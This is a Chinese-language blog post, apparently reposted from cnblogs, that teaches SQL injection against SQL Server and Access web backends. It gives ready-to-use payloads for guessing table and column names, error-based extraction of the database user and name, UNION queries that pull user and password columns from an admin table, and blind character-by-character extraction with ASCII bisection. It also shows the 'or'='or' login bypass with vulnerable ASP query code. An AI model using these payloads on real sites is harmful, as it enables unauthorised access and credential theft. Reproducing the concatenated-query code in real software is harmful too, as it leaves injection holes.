博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
利用AND和OR的运算规则进行SQL注入
阅读量:5149 次
发布时间:2019-06-13

本文共 2386 字,大约阅读时间需要 7 分钟。

方法1

先猜表名

And (Select count(*) from 表名)<>0

猜列名

And (Select count(列名) from 表名)<>0

或者也可以这样

and exists (select * from 表名)

and exists (select 列名 from 表名)

返回正确的,那么写的表名或列名就是正确

这里要注意的是,exists这个不能应用于猜内容上,例如and exists (select len(user) from admin)>3 这样是不行的

很多人都是喜欢查询里面的内容,一旦iis没有关闭错误提示的,那么就可以利用报错方法轻松获得库里面的内容

获得数据库连接用户名:;and user>0

引用《SQL注入天书》,重点在and user>0userSQLServer的一个内置变量,它的值是当前连接的用户名,类型为nvarchar。拿一个 nvarchar的值跟int的数0比较,系统会先试图将nvarchar的值转成int型,当然,转的过程中肯定会出错,SQLServer的出错提示是:将nvarchar转换int异常,XXXX不能转换成int"

看到这里大家明白了吧,报错的原理就是利用SQLserver内置的系统表进行转换查询,转换过程会出错,然后就会显示出在网页上,另外还有类似的and 1=(selet top 1 user from admin),这种语句也是可以爆出来的。;and db_name()>0 则是暴数据库名。

一旦关闭了IIS报错,那么还可以用union(联合查询)来查内容,主要语句就是

Order by 10

And 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin

And 1=2 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

上面的order by 10主要就是查字段数目,admin就是表名,可以自己猜,user,passwd是列名

反正就是返回正确即对,返回异常即错

另外还有十分常用的ASCII码拆半法

先要知道指定列名,例如user里的内容的长度

and (select len(user) from admin)=2 就是查询长度为不为2位,返回错误的增加或减少数字,一般这个数字不会太大,太大的就要放弃了,猜也多余

后面的逻辑符号可以根据不同要求更改的,

>;大于 <;小于 =就是等于咯,更新语句的话,=也可以表示传递符号 <>;就是不等

知道了长度后就可以开始猜解了

And (Select top 1 asc(mid(user,n,1)) from admin)>100

n就是猜解的表名的第几位,最后的长度数字就是刚才猜解出来的列名长度了,And (Select top 1 asc(mid(user,1,1)) from admin)>100 就是猜解user里内容的第一位的ASCII字符是不是大于100

正确的话,那么表示USER第一个字符的ASCII码大于100,那么就猜>120,返回错误就是介于100120之间,然后再一步一步的缩少,最终得到正确字符XXX,然后用ASCII转换器吧这个转换成普通字符就可以了

然后就是第二位 And (Select top 1 asc(mid(user,2,1)) from admin)>100 一直猜下去

加在url后面,列名表名还是先猜解,返回正确的代表帐号的ASCII码大于100,那么就再向前猜,直到报错,把猜出来的ASCII码拿去ASCII转换器转换就可以了,中文是负数,加上asb取绝对值

And (Select top 1 asb(asc(mid(user,n,1))) from admin)>15320

得到之后就记得在数字前加-号,不然ASCII转换器转换不来的,中文在ASCII码里是-23423这样的,所以猜起来挺麻烦

这个猜解速度比较慢,但是效果最好,最具有广泛性

方法2

后台身份验证绕过漏洞

验证绕过漏洞就是'or'='or'后台绕过漏洞,利用的就是ANDOR的运算规则,从而造成后台脚本逻辑性错误

例如管理员的账号密码都是admin,那么再比如后台的数据库查询语句是

user=request("user")

passwd=request("passwd")

sql='select admin from adminbate where user='&'''&user&'''&' and passwd='&'''&passwd&'''

那么我使用'or 'a'='a来做用户名密码的话,那么查询就变成了

select admin from adminbate where user=''or 'a'='a' and passwd=''or 'a'='a'

这样的话,根据运算规则,这里一共有4个查询语句,那么查询结果就是 假orandor真,先算and 再算or,最终结果为真,这样就可以进到后台了

这种漏洞存在必须要有2个条件,第一个:在后台验证代码上,账号密码的查询是要同一条查询语句,也就是类似

sql="select * from admin where username='"&username&'&"passwd='"&passwd&'

如果一旦账号密码是分开查询的,先查帐号,再查密码,这样的话就没有办法了。

第二就是要看密码加不加密,一旦被MD5加密或者其他加密方式加密的,那就要看第一种条件有没有可以,没有达到第一种条件的话,那就没有戏了

转载于:https://www.cnblogs.com/Aluosen/p/11335208.html

你可能感兴趣的文章
AngularJS ng-model在ng-if里面无效
查看>>
今天2019年5月,21点58分
查看>>
JavaScript_几种创建对象(2017-07-04)
查看>>
类的初始化
查看>>
centos 7 install eclipse cdt and use github
查看>>
android自定义键盘光标不显示解决方法
查看>>
第一章 大型网站架构演化
查看>>
java基础<迷你DVD系统>
查看>>
NO.6LINUX基本命令
查看>>
MFC中 CDateTimeCtrl 自定义日期显示格式
查看>>
冒泡排序、选择排序、插入排序
查看>>
java--多线程之Thread继承
查看>>
从0开始学golang--1--部署本地服务器
查看>>
Ubuntu查找通过apt命令已安装软件
查看>>
关于GC和析构函数的一个趣题
查看>>
跨域问题整理
查看>>
[Linux]文件浏览
查看>>
Sybase 存储过程中IF的用法
查看>>
EasyUI, Dialog 在框架页(ifrmae)的Top页面弹出时,拖拽Dialog边缘(以改变窗口大小),UI界面被卡死的解决办法...
查看>>
在26个大小写字母(52个),以及9个数字组成的字符列表中,随机生成10个8位密码...
查看>>